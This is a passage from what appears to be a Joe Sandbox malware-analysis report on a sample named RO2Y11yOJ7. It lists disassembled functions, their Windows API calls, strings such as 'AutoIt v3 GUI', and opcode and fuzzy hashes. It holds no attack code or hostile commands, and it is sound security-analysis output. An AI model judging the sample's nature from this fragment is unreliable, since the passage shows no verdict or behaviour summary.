                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EB9
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C8EE6
                                                          • DrawMenuBar.USER32(?), ref: 003C8EF5
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 003C8F1D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 570ea2b1633e73e416297c40bf8df71957d23a2cfc82fb236d789b6c100e10eb
                                                          • Instruction ID: 199554519a13348e8ada6ec2d4ffe2d96a0dbb460238fcd1bdf71c1615d455c7
                                                          • Instruction Fuzzy Hash: 09E15A75901208AEDF229F64DC84FEE7BB9EF05750F10816AF915EA290DB709E81DF60
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 003C4A33
                                                          • GetDesktopWindow.USER32 ref: 003C4A48
                                                          • GetWindowRect.USER32(00000000), ref: 003C4A4F
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003C4AB1
                                                          • DestroyWindow.USER32(?), ref: 003C4ADD
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C4B06
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C4B24
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003C4B4A
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 003C4B5F
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003C4B72
                                                          • IsWindowVisible.USER32(?), ref: 003C4B92
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003C4BAD
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003C4BC1
                                                          • GetWindowRect.USER32(?,?), ref: 003C4BD9
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 003C4BFF
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 003C4C19
                                                          • CopyRect.USER32(?,?), ref: 003C4C30
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 003C4C9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: cadee9cb454fdc3ac9930898a3f3b286f0601f6057c23ff8994156b34800d81b
                                                          • Instruction ID: 8b0b3a4fb8bd61aba6a43e98f6c35c3e77b783436a862dac69a258d104f00a2f
                                                          • Instruction Fuzzy Hash: 6BB13671604341AFDB06DF24C899F6ABBE9BB88310F00891DF599DB2A1DB71EC04CB95
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003A44ED
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003A4513
                                                          • _wcscpy.LIBCMT ref: 003A4541
                                                          • _wcscmp.LIBCMT ref: 003A454C
                                                          • _wcscat.LIBCMT ref: 003A4562
                                                          • _wcsstr.LIBCMT ref: 003A456D
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003A4589
                                                          • _wcscat.LIBCMT ref: 003A45D2
                                                          • _wcscat.LIBCMT ref: 003A45D9
                                                          • _wcsncpy.LIBCMT ref: 003A4604
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                          • API String ID: 699586101-1459072770
                                                          • Opcode ID: c901b08a9dddda0bd56478d8f9a60d0fcec599aa258176658cc16a5b9b3b6a10
                                                          • Instruction ID: 4327ed3a440312c630fde8d5530627a99653741195ea4bb1a35511e1cc6f66fd
                                                          • Instruction Fuzzy Hash: 7D410772A00204BFDB17AB749C47EFF776CDF42710F04806AF905EA192EB759A0197A9
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 003428C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003428EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 003428F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 0034291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00342939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00342949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0034297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00342990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003429AE
                                                          • GetStockObject.GDI32(00000011), ref: 003429CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 003429D5
                                                            • Part of subcall function 00342344: GetCursorPos.USER32(?), ref: 00342357
                                                            • Part of subcall function 00342344: ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                            • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                            • Part of subcall function 00342344: GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00341256), ref: 003429FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: 846ba54200fbf112bdeab37f1469600d3307307622e09d01253a972ec3f8f0b7
                                                          • Instruction ID: 763427483176c06fdf0f1170a84aafad799af8640209dd463e8acec912b7e4c5
                                                          • Instruction Fuzzy Hash: 55B16D71600209DFDB16DFA8DC45BAE7BB9FB48310F518129FA15EB290DB74A850CF54
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039A885
                                                          • __swprintf.LIBCMT ref: 0039A926
                                                          • _wcscmp.LIBCMT ref: 0039A939
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0039A98E
                                                          • _wcscmp.LIBCMT ref: 0039A9CA
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0039AA01
                                                          • GetDlgCtrlID.USER32(?), ref: 0039AA53
                                                          • GetWindowRect.USER32(?,?), ref: 0039AA89
                                                          • GetParent.USER32(?), ref: 0039AAA7
                                                          • ScreenToClient.USER32(00000000), ref: 0039AAAE
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039AB28
                                                          • _wcscmp.LIBCMT ref: 0039AB3C
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0039AB62
                                                          • _wcscmp.LIBCMT ref: 0039AB76
                                                            • Part of subcall function 003637AC: _iswctype.LIBCMT ref: 003637B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 158b9e7ab05960634fefa9cd8062a8b8ba31248edafa03bd42906687f07d2680
                                                          • Instruction ID: 7cc778ca7b3bb23415bf8cefacae852e05b7eadaa65a56e3fefdeda6727bf61f
                                                          • Instruction Fuzzy Hash: 69A1C072204B06AFDB16DF24C884FAAB7E9FF04354F118629F999C6190DB30E955CBD2
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0039B1DA
                                                          • _wcscmp.LIBCMT ref: 0039B1EB
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0039B213
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0039B230
                                                          • _wcscmp.LIBCMT ref: 0039B24E
                                                          • _wcsstr.LIBCMT ref: 0039B25F
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B297
                                                          • _wcscmp.LIBCMT ref: 0039B2A7
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0039B2CE
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0039B317
                                                          • _wcscmp.LIBCMT ref: 0039B327
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0039B34F
                                                          • GetWindowRect.USER32(00000004,?), ref: 0039B3B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 4c7902b445e3a286f0a86f891a85eabf50d007f89768d55fad0a082be613c063
                                                          • Instruction ID: c03cb24c1f7a1365e50dd085ee37f308a124e171d7753a68c4746569d44eaf55
                                                          • Instruction Fuzzy Hash: DB818F710083069FDF02DF15DA85FAABBE8EF44314F08856AFD859A0A6DB30ED45CB61
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 003CC691
                                                            • Part of subcall function 003CAB69: ClientToScreen.USER32(?,?), ref: 003CAB92
                                                            • Part of subcall function 003CAB69: GetWindowRect.USER32(?,?), ref: 003CAC08
                                                            • Part of subcall function 003CAB69: PtInRect.USER32(?,?,003CC07E), ref: 003CAC18
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC6FA
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003CC705
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003CC728
                                                          • _wcscat.LIBCMT ref: 003CC758
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003CC76F
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003CC788
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC79F
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 003CC7C1
                                                          • DragFinish.SHELL32(?), ref: 003CC7C8
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003CC8BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb@
                                                          • API String ID: 169749273-4025947017
                                                          • Opcode ID: ac6dfbd861e76496e72581d04c53925f6f240bc5aebff780c62c67f21e971c47
                                                          • Instruction ID: dd9a246894605456b8958ee28dd951a466b52344521fd18cc839a14633a9bb96
                                                          • Instruction Fuzzy Hash: 24615271508300AFC702EF64DC85E9FBBE9EF88710F00092EF5959B1A1DB70A949CB52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 13d747525f8170e4cc99f49de0ac78e0279b4d2f720bacfbb0176e19facafbca
                                                          • Instruction ID: 3b8e7adda0fff271de1fe216589adfc74fd8f77006de207e216592c417cafb18
                                                          • Opcode Fuzzy Hash: 13d747525f8170e4cc99f49de0ac78e0279b4d2f720bacfbb0176e19facafbca
                                                          • Instruction Fuzzy Hash: 9B31AE31A48209A6DF27EA60DE43EFFB7B89F10B10F210129F551792E6EF616F14C651
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 0039C2D3
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0039C2E5
                                                          • SetWindowTextW.USER32(?,?), ref: 0039C2FC
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0039C311
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0039C317
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C327
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0039C32D
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0039C34E
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0039C368
                                                          • GetWindowRect.USER32(?,?), ref: 0039C371
                                                          • SetWindowTextW.USER32(?,?), ref: 0039C3DC
                                                          • GetDesktopWindow.USER32 ref: 0039C3E2
                                                          • GetWindowRect.USER32(00000000), ref: 0039C3E9
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0039C435
                                                          • GetClientRect.USER32(?,?), ref: 0039C442
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0039C467
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0039C492
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: 0a5e2a2ae4199ad514dea82d0318af2973a8c71797ae13d8cd959b1d843299d6
                                                          • Instruction ID: ae1e2d29c9c49025a63a0c48c888e686f780ee10b53bedf133f78a3ba5962e5d
                                                          • Opcode Fuzzy Hash: 0a5e2a2ae4199ad514dea82d0318af2973a8c71797ae13d8cd959b1d843299d6
                                                          • Instruction Fuzzy Hash: 1A514B31900709AFDF22DFA8DD89F6EBBBAFF04704F004928E586A65A0C775B914CB50
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 003B5129
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003B5134
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 003B513F
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 003B514A
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 003B5155
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 003B5160
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 003B516B
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 003B5176
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 003B5181
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 003B518C
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 003B5197
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 003B51A2
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 003B51AD
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 003B51B8
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 003B51C3
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003B51CE
                                                          • GetCursorInfo.USER32(?), ref: 003B51DE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: 7371288ff4d2c40a4046073695488b9598fd021ebe8bf52e3ff7ad8d4822c01f
                                                          • Instruction ID: 0328a5b6a3585a53c5c716da79c20409f44d1dce05752965d5781d9a388db75f
                                                          • Opcode Fuzzy Hash: 7371288ff4d2c40a4046073695488b9598fd021ebe8bf52e3ff7ad8d4822c01f
                                                          • Instruction Fuzzy Hash: F73117B0D493196ADB119FB68C8999FBEECFF04754F50452AE50DEB280DA78A5008F91
                                                          APIs
                                                          • _memset.LIBCMT ref: 003CA28B
                                                          • DestroyWindow.USER32(?,?), ref: 003CA305
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003CA37F
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003CA3A1
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA3B4
                                                          • DestroyWindow.USER32(00000000), ref: 003CA3D6
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003CA40D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA426
                                                          • GetDesktopWindow.USER32 ref: 003CA43F
                                                          • GetWindowRect.USER32(00000000), ref: 003CA446
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003CA45E
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003CA476
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: 08e5cd04fa562e4d14bf2643aa997f19c69ee1d2c545999c46148116fec52ab9
                                                          • Instruction ID: 746c5877c74201f191c7e1d337881d86be5c515beca42be32e6d77ae148296a6
                                                          • Opcode Fuzzy Hash: 08e5cd04fa562e4d14bf2643aa997f19c69ee1d2c545999c46148116fec52ab9
                                                          • Instruction Fuzzy Hash: B0719971150648AFDB26DF28DC48F667BE9EB88708F04452DF985DB2A0D770AD12CF26
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 003C448D
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C44D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: f739bac449104774c1ff13d0ee927f4af661c0cd4902bd34402da30d235e9f4b
                                                          • Instruction ID: 572475ebad42a508bc5892b509aef3b2b56c7e5d53623d666ba28394f63fbe2e
                                                          • Opcode Fuzzy Hash: f739bac449104774c1ff13d0ee927f4af661c0cd4902bd34402da30d235e9f4b
                                                          • Instruction Fuzzy Hash: 83915B342047019BCB1AEF20C8A1B6AB7E5AF85310F15845DF8969F7A2CB31ED19CB81
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003CB8E8
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C91F4), ref: 003CB944
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB97D
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003CB9C0
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB9F7
                                                          • FreeLibrary.KERNEL32(?), ref: 003CBA03
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CBA13
                                                          • DestroyIcon.USER32(?,?,?,?,?,003C91F4), ref: 003CBA22
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003CBA3F
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003CBA4B
                                                            • Part of subcall function 0036307D: __wcsicmp_l.LIBCMT ref: 00363106
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
